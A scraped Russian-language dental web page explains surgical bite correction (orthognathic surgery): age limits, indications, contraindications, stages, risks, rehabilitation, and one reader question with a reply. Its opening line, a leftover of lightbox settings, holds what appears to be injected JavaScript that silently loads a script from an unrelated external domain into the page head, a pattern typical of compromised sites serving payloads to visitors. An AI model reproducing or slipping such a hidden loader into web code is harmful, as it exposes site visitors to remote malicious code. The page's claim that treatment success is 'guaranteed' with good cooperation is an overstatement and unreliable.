--> Хирургическое исправление прикуса или когда другие способы бессильны , 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Хирургическое вмешательство, как способ исправления прикуса

1 Star2 Stars3 Stars4 Stars5 Stars (6 голосов, средняя оценка: 4,50 из 5)
Loading ... Loading ...

Фото: женское лицо и руки хирурговВ ортодонтии для лечения тех или иных аномалий применяются различные методы лечения. Чаще всего это аппаратурный метод, когда врач для исправления прикуса и выравнивания зубов использует какой-либо ортодонтический аппарат. Также очень часто применяемым методом лечения является комплексный. Здесь сочетаются несколько методов, например, наиболее широко используемое сочетание – аппаратурный метод и хирургические манипуляции. К хирургическим манипуляциям в таком контексте относят удаление отдельных зубов, пластика уздечек, преддверия полости рта и др.

Всё это, так сказать, консервативные методы лечения ортодонтической патологии. Но бывают случаи, когда вышеперечисленными способами исправить прикус невозможно. Тогда прибегают к хирургическому исправлению прикуса, или ортогнатической хирургии. Этот метод лечения зарекомендовал себя у пациентов с ярко выраженной патологией, когда, используя даже самые современные ортодонтические аппараты, вылечить пациента не удастся.

Возрастные рамки для ортогнатической хирургии

Исправление прикуса хирургическим путём возможно только тогда, когда рост челюстей завершён.

У каждого человека этот момент наступает в определённое индивидуальное время. В среднем, считается, что к 18 годам у большинства людей рост челюстей заканчивается. Так что в большинстве случаев после восемнадцати лет уже возможно хирургическое исправление прикуса. Стоит отметить, что при некоторых врождённых аномалиях к ортогнатической хирургии прибегают намного раньше (при наличии показаний к такому вмешательству).

Ортогнатический прикус — его описание и характеристика

Показания

  • Значительно выраженные аномалии прикуса. Это могут быть как наследуемые и врождённые формы, так и приобретённые;
  • Травма челюстно-лицевой области, вследствие которой развилась аномалия;
  • Асимметрия лица, неподдающаяся ортодонтической коррекции и др.

В большинстве случаев, у пациентов, нуждающихся в хирургическом исправлении прикуса, могут иметь место недоразвитие одной или обеих челюстей, или наоборот, их чрезмерное развитие; неправильное положение челюстей относительно друг друга и/или основания черепа; комбинация нескольких вышеперечисленных вариантов.

Противопоказания

  1. Общие заболевания (некоторые болезни крови, сердечно-сосудистой системы, эндокринные патологии и др.);
  2. Незаконченный рост челюстей;
  3. Плохая гигиена полости рта (высокий риск инфицирования послеоперационных ран).

Основные этапы и способы хирургического исправления прикуса

Фото: операция по хирургическому исправлению прикусаНепосредственно перед хирургическим вмешательством требуется ортодонтическая подготовка. Пациенту устанавливается брекет-система, с помощью которой выравниваются зубные ряды. При необходимости на этом этапе проводится удаление зубов, пластика уздечек и т.д. Этот этап может длиться от нескольких месяцев до нескольких лет (в среднем год – полтора).

Затем собственно хирургическая операция. Проводится под обезболиванием (чаще наркоз) и длится обычно несколько часов (от 1 до 6).

Длительность операции, конечно, зависит от её сложности.

На сегодняшний день разрезы при реконструктивной хирургии челюстей проводятся преимущественно в полости рта. Так что шрамов и рубцов на лице бояться не стоит.

Во время хирургического исправления прикуса челюстно-лицевой хирург проводит рассечение (остеотомию) челюсти/челюстей в определённом месте, перемещает участки кости в нужное положение и закрепляет их там специальными приспособлениями. Это описание, конечно, очень краткое и упрощённое, но, надеемся, всем понятное.

После хирургического вмешательства следует опять ортодонтический этап. Новый прикус доводится до совершенства, достигаются множественные фиссурно-бугорковые контакты и т.д.

После снятия брекетов, как обычно, следует ретенционный период, во время которого для закрепления полученного результата необходимо носить ретейнеры.

Ожидаемые результаты

В результате исправления прикуса хирургическим путём пациент получает правильный прикус, восстановление некоторых нарушенных функций (жевания, глотания дыхания, речи, иногда исчезает храп и т.д.).

Кроме того, восстанавливается эстетика лица. Ведь зачастую именно нарушение внешнего вида, диспропорции лица в первую очередь заставляют обратиться пациента к врачу. В итоге человек (не побоимся преувеличить) становится счастливее. Этому способствуют гармоничный внешний вид, чистая речь, полноценное жевание, отсутствие храпа и т.д.

Как исправить глубокий прикус? Или всё, что вы хотели знать об этой патологии.
Как пользоваться воском для брекетов — рекомендации врача.

Чего бояться

Как Вы понимаете, любая операция (пусть даже незначительная), любое инвазивное вмешательство несёт в себе риск.

  1. Начнём с анестезии. Во время операции на челюстях делают как общее обезболивание (наркоз), так и местное. Чаще, конечно, прибегают к общей анестезии. Как человек её перенесёт, заранее узнать невозможно.
  2. Во время любой операции всегда есть риск заноса инфекции, кровотечения, аллергической реакции или непереносимости каких-то препаратов и др.
  3. И непосредственно успех самой операции реконструкции челюстей – удастся ли всё выполнить по намеченному плану.

Реабилитация

Это довольно сложный период. И от того, как он пройдёт, также может зависеть успех проведенной операции.

В первое время будут отёки и синяки. Приём пищи, разумеется, затруднён. Пища в основном жидкая.

Речь также часто затруднена. Возможно временное нарушение чувствительности (онемение) в прооперированной области. Очень важна тщательная гигиена полости рта, однако её выполнение также затруднено.

Фото: до и после исправления прикуса хирургическим путем

До и после хирургической операции по исправлению прикуса

Разумеется, необходимо строго соблюдать все рекомендации и выполнять все назначения врача. Обычно в послеоперационный период необходимо принимать антибиотики, проводить местную обработку полости рта и т.д.

Успех лечения зависит в большой степени от врача, его компетентности и опыта, но также и не в меньшей степени от самого пациента, его ответственности и добросовестности. При хорошей кооперации «врач – пациент» успех лечения гарантирован.

В случае хирургического исправления прикуса для успешного лечения необходимы также контакт и взаимопонимание врача-ортодонта и врача-хирурга. Так что здесь важна хорошая следующая коопрерация – «ортодонт-пациент», ортодонт-хирург», «хирург-пациент».

Комментарии

  1. Гульнар:

    Здравствуйте! Хочу сделать операцию по исправлению прикуса нижней челюсти. Подскажите пожалуйста в какой больнице делают такие операции в Астане? И не поздно ли делать такую операцию в возрасте 32-х лет? Какие шансы у меня?

  2. Екатерина Захарова:

    Гульнар, к сожалению не могу проконсультировать Вас по клиникам Астаны. А для того, чтобы определить показано ли вам хирургическое вмешательство обязательно нужна очная консультация. Так что могу Вам порекомендовать только обратиться к хорошему ортодонту в Вашем городе.

Комментировать